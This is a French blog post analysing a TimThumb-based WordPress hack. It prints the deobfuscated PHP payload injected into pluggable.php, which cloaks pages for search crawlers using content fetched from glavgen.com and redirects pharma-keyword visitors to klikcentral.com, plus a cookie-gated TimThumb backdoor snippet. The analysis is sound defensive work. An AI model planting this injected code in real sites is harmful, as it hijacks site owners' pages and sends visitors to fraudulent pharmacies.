WordPress Timthumb Viagra Attack : klikcentral.com / glavgen.com

Une tentative de hack, ce matin, qui cherche à exploiter la vulnérabilité TimThumb.

Le code obfusqué que l’attaque a tenté d’insérer dans le fichier wp-includes/pluggable.php de WordPress :

Une fois désobfusqué, on obtient ce code PHP :

 

// Analyst annotation (defensive): injected cloaking/redirect payload found in wp-includes/pluggable.php.
// Two behaviours: (1) requests that look like search-engine crawlers get content fetched from
// glavgen.com served in place of the real page; (2) human visitors arriving from a search engine
// on a pharma keyword are sent to klikcentral.com. Nothing below is legitimate WordPress code.
error_reporting(0); // hide any notice/warning the payload itself triggers (e.g. missing $_GET keys)
 // Three-octet IP prefixes (a.b.c): the last octet is stripped from REMOTE_ADDR before the lookup,
 // so each entry covers a whole /24. Presumably crawler address ranges — their only use is the
 // crawler check below; the list itself is a usable detection signature for this payload.
 $bot_list = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238"
,"199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130","174.129.66","85.17.19");
 // Drop the trailing ".N" octet so the comparison against $bot_list is prefix-based.
 $ip = preg_replace("/\.(\d+)$/", '', $_SERVER["REMOTE_ADDR"]);
 $agent = $_SERVER["HTTP_USER_AGENT"];
// Remote liveness probe: "?testd=ok" answers "ok!" and stops. A "testd=ok" query string in the
// access logs is a cheap indicator that this payload is (or was) being checked by its operator.
if ($_GET["testd"]=="ok") { print "ok!"; exit; }
// Crawler branch: IP prefix listed OR User-Agent contains "bot". strpos() is not compared with
// false, so a UA that starts with "bot" (offset 0) is missed — irrelevant for detection purposes.
if(in_array($ip, $bot_list) || strpos($agent, "bot")) {
 // Second probe, same "ok!" answer, keyed on the bare query string "q".
 if ($_SERVER["QUERY_STRING"]=="q") { print "ok!"; exit; }
 // Computed but never used below.
$page=urlencode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
 // base64 decodes to "http://glavgen.com/get.php?site=" (see the write-up above). Host, request
 // path, visitor IP and User-Agent leave the server as query parameters — expect outbound HTTP
 // from the web server to glavgen.com in egress/proxy logs while this payload is installed.
 $outsourceurl=base64_decode('aHR0cDovL2dsYXZnZW4uY29tL2dldC5waHA/c2l0ZT0=').urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
 // Fetch the attacker-controlled response: cURL if available, otherwise file_get_contents()
 // (which for a URL depends on allow_url_fopen being enabled).
 if (function_exists("curl_init")) {
 $c = curl_init();
 curl_setopt($c, CURLOPT_URL, $outsourceurl);
 curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
 $out = curl_exec($c);
 curl_close($c);
 } else {
 $out = file_get_contents($outsourceurl);
 }
 // Response protocol: a body starting with "OK!" means "replace the page" — everything after the
 // fourth byte is echoed to the crawler instead of the real content (search-engine cloaking).
 if (substr($out,0,3) == "OK!") { echo substr($out,4); die; }
 }
// Visitor branch: the referer mentions a search engine (unanchored, case-sensitive regex).
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"])) {
 // Pharma keyword list; "hoodia" and "acomplia" appear twice.
 $tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia');
 $niche='unknown';
 // No break: the *last* keyword found in the referer wins.
 foreach($tabs as $tab) {
 if(preg_match("/$tab/i", $_SERVER["HTTP_REFERER"])) {
 $niche = $tab;
 }
 }
 if ($niche!="unknown") {
 // base64 decodes to "http://klikcentral.com/traffic/in.cgi?11&parameter=" (see the write-up above).
 $urlsutra = base64_decode('aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMSZwYXJhbWV0ZXI9');
 // Loose "false ==" comparison: an empty response body also counts as a failed fetch. The referer
 // and host are concatenated into the URL without urlencode().
 if (false == ($str=file_get_contents($urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']))) {
 // Fetch failed: send the visitor to klikcentral.com with an HTTP redirect instead.
 header("location: ".$urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']);
 exit;
 } else {
 // Fetch succeeded: the remote pharma page is served inline under the blog's own URL.
 echo $str;
 exit;
 }
 }
 }

À chaque connexion vers le blog hacké identifiée comme provenant d’un robot d’indexation (adresse IP dans la liste ou User-Agent contenant « bot »), une connexion vers l’URL suivante est effectuée : http://glavgen.com/get.php?site=&page=&ip=&agent= Ceci permet donc de journaliser les connexions effectuées sur le blog. Si l’internaute provient d’un moteur de recherche (du moins si le nom d’un moteur de recherche apparaît dans le referer) et que ce dernier contient aussi un des mots suivants :

'viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia'
Alors l'internaute sera redirigé vers le site suivant : http://klikcentral.com/traffic/in.cgi?11&parameter=&seoref=&HTTP_REFERER= qui, vous l'avez deviné, est un faux site de vente de produits pharmaceutiques :

Un second « hack » a lieu, qui insère le code suivant dans la librairie TimThumb :

// Analyst annotation (defensive): gate injected into the TimThumb library. A request carrying a
// cookie "access-admin" whose md5 equals the hard-coded value skips the check entirely; every other
// request is refused when its "src" parameter contains ".php". Per the write-up, the effect is to
// lock competing attackers out of the same TimThumb hole while the cookie holder stays exempt.
// strpos() returns 0 (falsy) when ".php" sits at offset 0, so such a value is not blocked.
// The cookie name and the md5 value are usable indicators when auditing a TimThumb copy.
if(md5($_COOKIE['access-admin']) != "f732d47960be7e806861987f98a9574c") {
 $mysrc = $_GET['src'];
 if(strpos($mysrc,'.php')) {
 die;
 }
 }

Le but est d’empêcher un autre hack en interdisant, sauf présence du bon cookie « access-admin », tout paramètre « src » contenant « .php » sur la librairie.

Intéressant de constater que, cette fois, le hack n’a pas pour but d’insérer du code aboutissant à un exploit sur le site web afin d’infecter les visiteurs du blog ou de les rediriger vers de fausses pages web d’alerte faisant la promotion de rogues, mais de les envoyer vers une fausse page web pharmaceutique, ce qui est plutôt rare.
